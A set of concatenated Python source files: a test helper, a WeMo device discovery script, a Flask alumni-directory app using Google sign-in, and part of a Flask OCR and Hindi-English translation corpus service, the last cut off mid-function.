def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
skipna_wrapper : function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : list
The list of string. Each element represents the row of csv.
Returns
-------
expected : string
Expected output of to_csv() in current OS
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
|
discover.py
|
import ipaddress
import time
from os import getenv
from threading import Thread
from . import worker
def get_devices():
print('Finding WeMo devices...')
workers = worker.Workers(10, worker.ScanWorker, scan_timeout=2, connect_timeout=30, port=49153)
workers.start()
for addr in ipaddress.IPv4Network(getenv('NET_SPACE')):
workers.put(addr.exploded)
workers.send_stop()
devices = workers.wait()
print(f'Found {len(devices)} device(s)')
return devices
class DiscoveryWorker:
def __init__(self):
self.devices = []
self.thread = None
self.last_update = None
def _loop(self):
while True:
self.devices = get_devices()
self.last_update = time.time()
time.sleep(20)
def run(self):
t = Thread(target=self._loop, daemon=True)
t.start()
self.thread = t
|
app.py
|
import json
import os
import threading
import urllib.parse
import flask
import flask_talisman
import google.auth.transport.requests
import google.oauth2.id_token
import sheets
import sessions
ADMIN_ENABLED = bool(os.environ.get("LAM_ADMIN_ENABLED"))
ANALYTICS_ENABLED = bool(os.environ.get("LAM_ANALYTICS_ENABLED"))
AUTOFETCH_ENABLED = bool(os.environ.get("LAM_AUTOFETCH_ENABLED"))
TLS_ENABLED = bool(os.environ.get("LAM_TLS_ENABLED"))
app = flask.Flask(__name__, template_folder=".")
if TLS_ENABLED:
flask_talisman.Talisman(app, content_security_policy=None)
@app.route("/")
def get_index():
return flask.render_template("dist/index.html", analytics_enabled=ANALYTICS_ENABLED)
@app.route("/oauth")
def get_oauth_redirect():
return flask.send_file("dist/oauth.html")
@app.route("/admin")
def get_admin():
if ADMIN_ENABLED:
return flask.send_file("dist/admin.html")
else:
return "Admin dashboard not enabled", 403
@app.route("/<path>")
def get_static_file(path):
if not path.endswith(".html"):
return flask.send_from_directory("dist", path)
flask.abort(404)
@app.route("/api/v1/admin/data")
def get_admin_data():
if ADMIN_ENABLED:
try:
with open("data.json") as f:
return flask.jsonify(json.load(f))
except (OSError, json.JSONDecodeError):
return "Data not available", 500
else:
return "Admin dashboard not enabled", 403
@app.route("/api/v1/admin/data", methods=["POST"])
def set_admin_data():
if ADMIN_ENABLED:
try:
data = flask.request.get_json()
with open("data.json.tmp", "w") as f:
json.dump(data, f)
os.rename("data.json.tmp", "data.json")
return "Wrote data successfully", 200
except OSError:
return "Failed to write data", 500
else:
return "Admin dashboard not enabled", 403
@app.route("/api/v1/admin/download", methods=["POST"])
def admin_download():
if ADMIN_ENABLED:
try:
sheets.download_form_responses()
return "Downloaded data successfully", 200
except Exception as e:
return f"Failed to download data: {e}", 500
else:
return "Admin dashboard not enabled", 403
@app.route("/api/v1/admin/upload", methods=["POST"])
def admin_upload():
if ADMIN_ENABLED:
try:
sheets.upload_form_responses()
return "Uploaded data successfully", 200
except Exception as e:
return f"Failed to upload data: {e}", 500
else:
return "Admin dashboard not enabled", 403
PUBLIC_KEYS = {
"city",
"cityLat",
"cityLong",
"comments",
"country",
"facebookProfile",
"email",
"major",
"name",
"org",
"orgLat",
"orgLink",
"orgLong",
"path",
"phoneNumber",
"state",
"summerCity",
"summerCityLat",
"summerCityLong",
"summerCountry",
"summerOrg",
"summerOrgLat",
"summerOrgLink",
"summerOrgLong",
"summerPlans",
"summerState",
}
@app.route("/api/v1/data", methods=["POST"])
def get_data():
try:
token = flask.request.json["oauthToken"]
if not isinstance(token, str):
raise TypeError
except (KeyError, TypeError, json.JSONDecodeError):
return "Request did not include token", 400
email = sessions.check_token(token)
if not email:
try:
# This API call takes about 125ms in my testing. Could be
# optimized by doing our own JWT validation, probably. But
# that would really suck so let's hold off on that for
# now.
#
# https://developers.google.com/identity/sign-in/web/backend-auth
idinfo = google.oauth2.id_token.verify_oauth2_token(
token,
google.auth.transport.requests.Request(),
"548868103597-3th6ihbnejkscon1950m9mm31misvhk9.apps.googleusercontent.com",
)
if idinfo["iss"] not in (
"accounts.google.com",
"https://accounts.google.com",
):
raise ValueError("Wrong issuer: {}".format(idinfo["iss"]))
if idinfo["hd"] != "g.hmc.edu":
raise ValueError("Wrong domain: {}".format(idinfo["hd"]))
email = idinfo["email"]
sessions.add_token(token, email)
except ValueError as e:
# Be careful changing. This is a magic string for the front end
return "Bad token: {}".format(e), 401
try:
with open("data.json") as f:
responses = json.load(f)
return flask.jsonify(
{
"responses": [
{
"postGradEmail": r.get("postGradEmail", "")
or r.get("email", ""),
**{key: r.get(key, "") for key in PUBLIC_KEYS},
}
for r in responses
if r["processed"]
],
"email": email.replace("g.hmc.edu", "hmc.edu")
if not ADMIN_ENABLED
else "*",
}
)
except (OSError, json.JSONDecodeError):
return "Data not available", 500
@app.errorhandler(404)
def page_not_found(e):
return "Page not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "Internal server error", 500
if AUTOFETCH_ENABLED:
def start_autofetch():
try:
sheets.download_form_responses()
finally:
timer = threading.Timer(60, start_autofetch)
timer.daemon = True
timer.start()
threading.Thread(target=start_autofetch, daemon=True).start()
|
app.py
|
"""
* @author ['aroop']
* @email ['aroop.ghosh@tarento.com']
* @create date 2019-06-25 12:40:01
* @modify date 2019-06-25 12:40:01
* @desc [description]
"""
from flask import Flask, jsonify, request
import os
import glob
from datetime import datetime
import time
import logging
import math
import json
import uuid
import multiprocessing as mp
from flask_cors import CORS
import flask as flask
from models.status import Status
from models.response import CustomResponse
from logging.config import dictConfig
from db.conmgr import getinstance
from db.conmgr_mongo import connectmongo
from utils.pdftoimage import converttoimage
from utils.imagetotext import convertimagetotext
# from jaeger.middleware import LoggerMiddleware
from utils.imagetoalto import convertimagetoalto
from utils.removetextv2 import removetext
from utils.imagetopdf import converttopdf
from utils.translateandupdateimage import translateandupdateimage
from utils.process_paragraph import processhindi
from utils.process_paragraph_eng import processenglish
from utils.remove_page_number_filter import filtertext
from utils.separate import separate
from utils.translatewithgoogle import translatewithgoogle, translatesinglesentence
from utils.translatewithanuvada_eng import translatewithanuvadaeng
from models.words import savewords
from models.sentence_log import Sentencelog
from models.translation import Translation
from models.translation_process import TranslationProcess
from models.words import fetchwordsfromsentence
from models.sentence import Sentence
from models.corpus import Corpus
from models.benchmark import Benchmark
from controllers.admin_api import admin_api
from controllers.corpus import corpus_api
from controllers.document_api import document_api
from controllers.elastic_search_api import indexer_api
from controllers.file_converter import file_converter
from elastic_utils.elastic_search_indexer import sentence_creator
from utils.document_assembler import keep_on_running
from utils.document_writer import write_document
import threading
import atexit
from utils.thread_manager import thread_manager
from apscheduler.schedulers.background import BackgroundScheduler
from controllers.ner_annotation_api import ner_annotation_api
# from jaeger_client import Config
""" Logging Config, for debug logs please set env 'app_debug_logs' to True """
dictConfig({
'version': 1,
'formatters': {'default': {
'format': '[%(asctime)s] {%(filename)s:%(lineno)d} %(threadName)s %(levelname)s in %(module)s: %(message)s',
}},
'handlers': {
'info': {
'class': 'logging.FileHandler',
'level': 'DEBUG',
'formatter': 'default',
'filename': 'info.log'
},
'console': {
'class': 'logging.StreamHandler',
'level': 'DEBUG',
'formatter': 'default',
'stream': 'ext://sys.stdout',
}
},
'loggers': {
'file': {
'level': 'DEBUG',
'handlers': ['info', 'console'],
'propagate': ''
}
},
'root': {
'level': 'DEBUG',
'handlers': ['info', 'console']
}
})
LANGUAGES = {
'Hindi': 'hi',
'English': 'en',
'Bengali':'bn',
'Gujarati':'gu',
'Marathi':'mr',
'Kannada':'kn',
'Telugu':'te',
'Malayalam':'ml',
'Punjabi':'pa',
'Tamil': 'ta',
'Urdu': 'ur'
}
app = Flask(__name__)
# app.wsgi_app = LoggerMiddleware(app.wsgi_app)
CORS(app)
app.register_blueprint(corpus_api)
app.register_blueprint(admin_api)
app.register_blueprint(document_api)
app.register_blueprint(indexer_api)
app.register_blueprint(ner_annotation_api)
app.register_blueprint(file_converter)
UPLOAD_FOLDER = 'upload'
STATUS_PENDING = 'PENDING'
STATUS_PROCESSING = 'PROCESSING'
STATUS_PROCESSED = 'COMPLETED'
STATUS_EDITED = 'EDITED'
ES_SERVER_URL = 'http://localhost:9876/'
PROFILE_REQ_URL = ES_SERVER_URL + 'users/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
es = getinstance()
words = []
connectmongo()
# config = Config(
# config={ # usually read from some yaml config
# 'sampler': {
# 'type': 'const',
# 'param': 1,
# },
# 'logging': True,
# },
# service_name='python-test',
# validate=True,
# )
# # this call also sets opentracing.tracer
# tracer = config.initialize_tracer()
# @app.before_request
# def before():
# global tracer
# print("Printing request")
# print(request.headers)
# with tracer.start_span('TestSpan') as span:
# span.log_kv({'event': 'test message', 'life': 42})
# pass
# @app.after_request
# def after(response):
# global tracer
# print("Printing response")
# print(response.status)
# print(response.headers)
# print(response.get_data())
# tracer.close()
# return response
# scheduler = BackgroundScheduler()
# scheduler.add_job(func=thread_manager, trigger="interval", minutes=2)
# scheduler.start()
# # Shut down the scheduler when exiting the app
# atexit.register(lambda: scheduler.shutdown())
log = logging.getLogger('file')
try:
app_debug_logs = os.environ['app_debug_logs']
if app_debug_logs == 'False':
logging.disable(logging.DEBUG)
log.info("DEBUG LOGS InACTIVE")
else:
log.info("DEBUG LOGS ACTIVE")
except:
logging.disable(logging.DEBUG)
log.info("DEBUG LOGS InACTIVE")
try:
t1 = threading.Thread(target=keep_on_running, name='keep_on_running')
t1.start()
# t2 = threading.Thread(target=write_document, name='write_document')
# t2.start()
# t3 = threading.Thread(target=sentence_creator, name='sentence_creator')
# t3.setDaemon(True)
# t3.start()
except Exception as e:
log.info('ERROR WHILE RUNNING CUSTOM THREADS '+str(e))
@app.route('/hello', methods=['GET'])
def hello_():
log.info('testing info log')
log.info('testing debug logs')
log.error('test error logs')
return "hello"
""" to get list of corpus available """
@app.route('/fetch-corpus', methods=['GET'])
def fetch_corpus():
if request.headers.get('ad-userid') is not None:
log.info('fetch_corpus: initiated by ' + request.headers.get('ad-userid'))
else:
log.info('fetch_corpus: initiated by anonymous user')
corpus = Corpus.objects.to_json()
res = CustomResponse(Status.SUCCESS.value, json.loads(corpus))
return res.getres()
""" to get all the process from mongo in order of insertion """
@app.route('/fetch-translation-process', methods=['GET'])
def fetch_translation_process():
log.info('fetch_translation_process : started at ' + str(getcurrenttime()))
try:
transalationProcess = TranslationProcess.objects(created_by=request.headers.get('ad-userid')).order_by(
'-basename').to_json()
res = CustomResponse(Status.SUCCESS.value, json.loads(transalationProcess))
except:
log.info('fetch-translation-process : ERROR occured')
pass
log.info('fetch_translation_process : ended at ' + str(getcurrenttime()))
return res.getres()
@app.route('/fetch-translation', methods=['GET'])
def fetch_translation():
basename = request.args.get('basename')
sentences = Translation.objects(basename=basename).to_json()
res = CustomResponse(Status.SUCCESS.value, json.loads(sentences))
return res.getres()
""" for translating source """
@app.route('/translate-source', methods=['GET'])
def translate_source():
sources = []
source = request.args.get('source')
basename = request.args.get('basename')
if source is None or basename is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
sources.append(source)
corpus_obj = Corpus.objects(basename=basename)
corpus_dict = json.loads(corpus_obj.to_json())
target_lang = 'en'
if 'target_lang' in corpus_dict[0] and corpus_dict[0]['target_lang'] is not None:
target_lang = LANGUAGES[corpus_dict[0]['target_lang']]
translation_list = translatesinglesentence(sources, target_lang)
res = CustomResponse(Status.SUCCESS.value, translation_list)
return res.getres()
""" to get list of sentences for given corpus """
@app.route('/fetch-sentences', methods=['GET'])
def fetch_sentences():
global LANGUAGES
basename = request.args.get('basename')
totalcount = 0
(sentencesobj, totalcount) = Sentence.limit(request.args.get('pagesize'), basename, request.args.get('status'),
request.args.get('pageno'))
corpus_obj = Corpus.objects(basename=basename)
corpus_dict = json.loads(corpus_obj.to_json())
sentences_list = []
sources = []
if sentencesobj is not None:
for sent in sentencesobj:
sent_dict = json.loads(sent.to_json())
corpus = Sentence.objects(_id=sent_dict['_id']['$oid'])
if sent_dict['status'] == STATUS_PENDING:
corpus.update(set__status=STATUS_PROCESSING)
sources.append(sent_dict['source'])
target_lang = 'en'
if 'target_lang' in corpus_dict[0] and corpus_dict[0]['target_lang'] is not None:
target_lang = LANGUAGES[corpus_dict[0]['target_lang']]
translation_list = translatesinglesentence(sources, target_lang)
index = 0
for sent in sentencesobj:
sent_dict = json.loads(sent.to_json())
sent_dict['translation'] = translation_list[index]
sentences_list.append(sent_dict)
index += 1
# print()
# for sentence in sentencesobj:
# # sentence.update(set__status=STATUS_PROCESSING, set__locked=True, set__locked_time=datetime.now())
# sentence.update(set__status=STATUS_PROCESSING)
res = CustomResponse(Status.SUCCESS.value, sentences_list, totalcount)
return res.getres()
""" to update sentences present in corpus """
@app.route('/update-sentences', methods=['POST'])
def update_sentences():
body = request.get_json()
if (body['sentences'] is None or not isinstance(body['sentences'], list)):
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
for sentence in body['sentences']:
corpus = Sentence.objects(_id=sentence['_id']['$oid'])
corpus_dict = json.loads(corpus.to_json())
sentence_log = Sentencelog(source_words=corpus_dict[0]['source'].split(" "),
target_words=corpus_dict[0]['target'].split(" "),
source_edited_words=sentence['source'].split(" "),
updated_on=datetime.now(), edited_by=request.headers.get('ad-userid'),
parent_id=sentence['_id']['$oid'], target_edited_words=sentence['target'].split(" "),
basename=corpus_dict[0]['basename'], source=corpus_dict[0]['source'],
target=corpus_dict[0]['target'], source_edited=sentence['source'],
target_edited=sentence['target'])
sentence_log.save()
corpus.update(set__source=sentence['source'], set__target=sentence['target'], set__status=STATUS_EDITED)
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
""" to update sentences grade in corpus """
@app.route('/update-sentences-grade', methods=['POST'])
def update_sentences_grade():
body = request.get_json()
if (body['sentences'] is None or not isinstance(body['sentences'], list)):
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
for sentence in body['sentences']:
corpus = Sentence.objects(_id=sentence['_id']['$oid'])
corpus.update(set__rating=sentence['rating'])
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
""" to update sentences status present in corpus """
@app.route('/update-sentences-status', methods=['POST'])
def update_sentences_status():
body = request.get_json()
if (body['sentences'] is None or not isinstance(body['sentences'], list)):
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
for sentence in body['sentences']:
corpus = Sentence.objects(_id=sentence['_id']['$oid'])
corpus.update(set__status=sentence['status'])
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
@app.route('/translate-file', methods=['POST'])
def translateFile():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['file']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '.pdf')
translationProcess = TranslationProcess(
status=STATUS_PROCESSING, name=f.filename, created_on=current_time, basename=basename)
translationProcess.save()
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, ''), callback=capturealtotext)
pool.close()
pool.join()
res = CustomResponse(Status.SUCCESS.value, '')
translationProcess = TranslationProcess.objects(basename=basename)
translationProcess.update(set__status=STATUS_PROCESSED)
return res.getres()
@app.route('/get-file-data', methods=['POST'])
def getfiledata():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['file']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '.pdf')
# translationProcess = TranslationProcess(
# status=STATUS_PROCESSING, name=f.filename, created_on=current_time, basename=basename)
# translationProcess.save()
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_eng'), callback=capturetext)
pool.close()
pool.join()
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_filtered.txt')
# translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_tran.txt')
# f_eng = open(app.config['UPLOAD_FOLDER']+'/' +
# basename + '_eng_filtered.txt', 'r')
english_res = []
# hindi_res = []
# for f in f_eng:
# english_res.append(f)
# f_eng.close()
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' +
basename + '_eng_filtered.txt', 'r')
for f in f_eng:
english_res.append(f)
f_eng.close()
data = {'english': english_res}
# translations = []
# for i in range(0, len(hindi_res)):
# translation = Translation(basename=str(
# basename), source=hindi_res[i], target=english_res[i])
# translations.append(translation)
# Translation.objects.insert(translations)
res = CustomResponse(Status.SUCCESS.value, data)
result = flask.send_file(os.path.join('upload/', basename + '_eng_filtered.txt'), as_attachment=True)
result.headers["x-suggested-filename"] = basename + '.txt'
# translationProcess = TranslationProcess.objects(basename=basename)
# translationProcess.update(set__status=STATUS_PROCESSED)
return result
@app.route('/translate', methods=['POST'])
def translate():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['file']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '.pdf')
translationProcess = TranslationProcess(
status=STATUS_PROCESSING, name=f.filename, created_on=current_time, basename=basename)
translationProcess.save()
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_hin'), callback=capturetext)
pool.close()
pool.join()
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt')
translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_tran.txt')
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' +
basename + '_eng_tran.txt', 'r')
english_res = []
hindi_res = []
for f in f_eng:
english_res.append(f)
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] + '/' +
basename + '_hin_filtered.txt', 'r')
for f in f_hin:
hindi_res.append(f)
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res}
translations = []
for i in range(0, len(hindi_res)):
translation = Translation(basename=str(
basename), source=hindi_res[i], target=english_res[i])
translations.append(translation)
Translation.objects.insert(translations)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
translationProcess = TranslationProcess.objects(basename=basename)
translationProcess.update(set__status=STATUS_PROCESSED)
return res.getres()
@app.route('/batch-sentences', methods=['GET'])
def batchsentences():
basename = request.args.get('basename')
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
sentences = Sentence.objects(basename=basename)
corpus_obj = Corpus.objects(basename=basename)
index = 2
batch_size = 10000
if len(sentences) > batch_size:
for i in range(2, 1 + math.ceil(len(sentences) / batch_size)):
base = str(uuid.uuid4())
if (i) * batch_size > len(sentences):
sentence_batch = sentences[0:(i - 1) * batch_size - len(sentences)]
print(len(sentence_batch))
if len(sentence_batch) > 0:
corpus = Corpus(source_lang='English', target_lang='Hindi', status=STATUS_PROCESSED,
name='SC Judgment 2019 Batch ' + str(index), domain='LAW', created_on=current_time,
last_modified=current_time, author='', comment='',
no_of_sentences=len(sentence_batch),
basename=base)
corpus.save()
for sentence in sentence_batch:
sentence_dict = json.loads(sentence.to_json())
sen = Sentence.objects(_id=sentence_dict['_id']['$oid'])
print(sen.to_json())
sen.update(set__basename=base)
else:
sentence_batch = sentences[0:batch_size]
print(len(sentence_batch))
if len(sentence_batch) > 0:
corpus = Corpus(source_lang='English', target_lang='Hindi', status=STATUS_PROCESSED,
name='SC Judgment 2019 Batch ' + str(index), domain='LAW', created_on=current_time,
last_modified=current_time, author='', comment='',
no_of_sentences=len(sentence_batch),
basename=base)
corpus.save()
for sentence in sentence_batch:
sentence_dict = json.loads(sentence.to_json())
sen = Sentence.objects(_id=sentence_dict['_id']['$oid'])
print(sen.to_json())
sen.update(set__basename=base)
index += 1
res = CustomResponse(Status.FAILURE.value, basename)
return res.getres()
@app.route('/remove-process', methods=['POST'])
def delete_process():
log.info('delete_process: started at ' + str(getcurrenttime()))
try:
basename = request.form.getlist('processname')[0]
log.info('delte_process : requested basename is : ' + basename)
translationProcess = TranslationProcess.objects(basename=basename).delete()
log.info('delete_process: ended at ' + str(getcurrenttime()))
res = CustomResponse(Status.SUCCESS.value, basename)
except:
log.info('delte_process : ERROR while processing basename : ' + basename)
res = CustomResponse(Status.FAILURE.value, basename)
return res.getres()
@app.route('/single', methods=['POST'])
def upload_single_file():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Corpus(status=STATUS_PROCESSING, name=str(basename), domain='', created_on=current_time,
last_modified=current_time, author='', comment='', no_of_sentences=0)
corpus.save()
f = request.files['file']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '.pdf')
f.save(filepath)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, ''), callback=capturetext)
pool.close()
pool.join()
separate(app.config['UPLOAD_FOLDER'] + '/' + basename)
return process_files(basename)
@app.route('/multiple-law', methods=['POST'])
def upload_file_law():
pool = mp.Pool(mp.cpu_count())
basename = str(int(time.time()))
try:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
f = request.files['hindi']
f_eng = request.files['english']
filepath = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_hin.pdf')
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng.pdf')
f.save(filepath)
f_eng.save(filepath_eng)
pool.apply_async(converttoimage, args=(
filepath, app.config['UPLOAD_FOLDER'], basename, '_hin'), callback=capturetext)
pool.apply_async(converttoimage, args=(
filepath_eng, app.config['UPLOAD_FOLDER'], basename, '_eng'), callback=capturetext)
pool.close()
pool.join()
return process_files_law(basename, 'OLD_LAW_CORPUS')
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
def process_files_law(basename, name):
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_hin_filtered.txt')
filtertext(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng.txt',
app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt')
processhindi(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt')
processenglish(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_filtered.txt')
translatewithgoogle(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_hin_filtered.txt', app.config['UPLOAD_FOLDER'] +
'/' + basename + '_eng_tran.txt')
os.system(
'./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
'_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
hindi_res = []
english_points = []
english_points_words = []
hindi_points = []
hindi_points_words = []
f_eng = open(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_output-t', 'r')
for f in f_eng:
english_res.append(f)
point = fetchwordsfromsentence(f, basename)
english_points.append(point['avg'])
english_points_words.append(point['values'])
f_eng.close()
f_hin = open(app.config['UPLOAD_FOLDER'] +
'/' + basename + '_output-s', 'r')
for f in f_hin:
hindi_res.append(f)
point = fetchwordsfromsentence(f, basename)
hindi_points.append(point['avg'])
hindi_points_words.append(point['values'])
f_hin.close()
data = {'hindi': hindi_res, 'english': english_res,
'english_scores': english_points, 'hindi_scores': hindi_points}
sentences = []
for i in range(0, len(hindi_res)):
sentence = Sentence(status=STATUS_PENDING, alignment_accuracy=english_res[i].split(':::::')[1], basename=name,
source=hindi_res[i], target=english_res[i].split(':::::')[0],
source_ocr_words=hindi_points_words[i], source_ocr=str(hindi_points[i]),
target_ocr_words=english_points_words[i], target_ocr=str(english_points[i]))
sentences.append(sentence)
# sentence.save()
Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = CustomResponse(Status.SUCCESS.value, data)
# corpus = Corpus.objects(basename=basename)
# corpus.update(set__status=STATUS_PROCESSED,
# set__no_of_sentences=len(hindi_res))
return res.getres()
@app.route('/remove-junk', methods=['POST'])
def remove_junk():
basename = str(int(time.time()))
f = request.files['file']
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_junk.txt')
f.save(filepath_eng)
f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_junk.txt', 'r')
for t in f_eng:
Sentence.objects(source=t).delete()
res = CustomResponse(Status.SUCCESS.value, None)
return res.getres()
@app.route('/save-benchmark', methods=['POST'])
def upload_benchmark_file():
basename = str(int(time.time()))
assign_to = ''
if request.headers.get('ad-userid') is not None:
assign_to
try:
name = request.form.getlist('name')
source_lang = request.form.getlist('source_lang')
if source_lang is None or len(
source_lang) == 0 or len(source_lang[0]) == 0 or name is None or len(name) == 0 or len(
name[0]) == 0 or request.files is None or \
request.files['file'] is None:
res = CustomResponse(
Status.ERR_GLOBAL_MISSING_PARAMETERS.value, None)
return res.getres(), Status.ERR_GLOBAL_MISSING_PARAMETERS.value['http']['status']
else:
current_time = datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
corpus = Benchmark(source_lang=source_lang[0], status=STATUS_PROCESSING,
name=name[0], created_on=current_time,assigned_to=request.headers.get('ad-userid'),
last_modified=current_time, author='', no_of_sentences=0,
basename=basename)
corpus.save()
f_eng = request.files['file']
filepath_eng = os.path.join(
app.config['UPLOAD_FOLDER'], basename + '_eng_filtered.txt')
f_eng.save(filepath_eng)
# f = request.files['hindi']
# filepath = os.path.join(
# app.config['UPLOAD_FOLDER'], basename + '_hin_filtered.txt')
# f.save(filepath)
# translatewithanuvadaeng(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', model_id[0])
# target_lang = LANGUAGES[target_lang[0]]
# translatewithgoogle(app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_eng_filtered.txt', app.config['UPLOAD_FOLDER'] +
# '/'+basename+'_hin_filtered.txt', target_lang)
# os.system('./helpers/bleualign.py -s ' + os.getcwd() + '/upload/' + basename + '_hin_filtered' + '.txt' + ' -t ' + os.getcwd() + '/upload/' + basename +
# '_eng_filtered' + '.txt' + ' --srctotarget ' + os.getcwd() + '/upload/' + basename + '_eng_tran' + '.txt' + ' -o ' + os.getcwd() + '/upload/' + basename + '_output')
english_res = []
# f_eng = open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt', 'r')
error = False
error_messages = 'Error came for Sentences'
with open(app.config['UPLOAD_FOLDER'] + '/' + basename + '_eng_filtered.txt', 'rb') as f:
# for f in f_eng:
flist = f.readlines()
index = 1
for f_data in flist:
try:
if f_data.decode("utf8") != '\n' and len(f_data.decode("utf8")) > 0:
index = index + 1
english_res.append(f_data.decode("utf8"))
except Exception as e:
error = True
error_messages = error_messages +' '+str(index)
index = index + 1
# f_eng.close()
data = {'english': english_res}
sentences = []
for i in range(0, len(english_res)):
sentence = Sentence(sentenceid=str(uuid.uuid4()), status=STATUS_PENDING, basename=str(
basename), source=english_res[i])
try:
sentence.save()
except Exception as e:
error = True
error_messages = error_messages+' '+english_res[i]
# sentences.append(sentence)
# sentence.save()
# Sentence.objects.insert(sentences)
for f in glob.glob(app.config['UPLOAD_FOLDER'] + '/' + basename + '*'):
os.remove(f)
res = None
log.info(error)
if error:
res = {}
res = Status.ERR_GLOBAL_SYSTEM.value
res['why'] = error_messages
# res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, error_messages)
return jsonify(res),500
else:
res = CustomResponse(Status.SUCCESS.value, data)
corpus = Benchmark.objects(basename=basename)
corpus.update(set__status=STATUS_PROCESSED,
set__no_of_sentences=len(english_res))
return res.getres()
except Exception as e:
print(e)
res = CustomResponse(Status.ERR_GLOBAL_SYSTEM.value, None)
return res.getres(), Status.ERR_GLOBAL_SYSTEM.value['http']['status']
@app.route('/indian-kanoon', methods=['POST'])
def upload_indian_kannon_file():
basename = str(int(time.time()))
try:
name = request.form.getlist('name')
domain = request.form.getlist('domain')
source_lang = request.form.getlist('source_lang')
